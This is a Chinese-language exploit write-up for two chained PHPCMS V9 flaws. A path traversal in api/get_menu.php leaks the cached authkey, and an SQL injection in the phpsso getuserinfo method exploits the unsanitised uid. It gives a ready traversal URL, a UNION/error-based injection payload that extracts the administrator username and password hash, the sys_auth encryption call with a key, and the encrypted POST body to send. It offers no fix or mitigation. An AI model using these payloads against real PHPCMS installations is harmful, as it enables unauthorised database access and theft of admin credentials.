phpsso.php 注入漏洞,PHPCMS V9 /phpsso_server/phpcms/modules/phpsso/index.php SQL注入漏洞

• /api/get_menu.php

function ajax_getlist() {

$cachefile = $_GET['cachefile'];

$cachefile = str_replace(array('/', '//'), '', $cachefile);

//$cachefile = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $cachefile);

$path = $_GET['path'];

$path = str_replace(array('/', '//'), '', $path);

//$path = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $path);

$title = $_GET['title'];

$key = $_GET['key'];

$infos = getcache($cachefile,$path);

其中getcache中参数可控，可以包含cache文件夹中配置文件得到authkey。利用authkey可以进行SQL注入。

• /phpsso_server/phpcms/modules/phpsso/index.php

public function getuserinfo($is_return = 0) {

$this->uid = isset($this->data['uid']) ? $this->data['uid'] : '';

$this->email = isset($this->data['email']) ? $this->data['email'] : '';

if($this->uid > 0) {

$r = $this->db->get_one(array('uid'=>$this->uid));

} elseif(!empty($this->username)) {

$r = $this->db->get_one(array('username'=>$this->username));

} elseif(!empty($this->email)) {

$r = $this->db->get_one(array('email'=>$this->email));

} else {

return false;

}

将uid直接带入查询，造成SQL注入漏洞。

访问URL地址，获取authkey：

http://10.211.55.12/phpcms/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin&key=authkey

利用PHPCMS的内置加密函数sys_auth加密如下内容：

uid=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 and (select 1 from  (select count(*),concat((select concat(username,'|',password,0x3a3a,encrypt)from v9_sso_admin limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

调用方法为：

echo sys_auth("uid=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 and (select 1 from  (select count(*),concat((select concat(username,'|',password,0x3a3a,encrypt)from v9_sso_admin limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'", "ENCODE", "94n16bQt8F0900oowgpQENmCvCd69szh");

得到结果为： 

利用Hackbar进行注入，POST内容：

data=ada8YbYCC4vW3ZUiLq9FHK4AU0W2Nrho-QpN_rBOBhf8MRIqj_GOZS5-EUBX8_oL6QlfTkvv84VuO_ZFa_JlrxiYgxai6qjiikU78vn90aH-jnD4Emx4LYPx2pCiuNB3HKUvKiykjtnZSwlBAlBdpGOTvYnoZOgiXFBcfPCf-ApPYyVlQCSoN0BS04yKgUdU8ijkulguiKwDR1jYzaFA_GLGtV-R1AkEKHNz9ImpH_QwIzAwd4SJdhrPgVej69CS_rLMfYNH7F1f174jzPjunyKfJCEgszsmoHys19fIVMyiABzRU6t_tzTjmX9xGFahK7nnFRx8cdC13aT0nMO9txLCL5f0uTS86kn2CXRa9rN_-8JLTl0hv9dNsNvVGSHk4ndz

到：

http://10.211.55.12/phpcms/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1

得到管理员的帐号密码：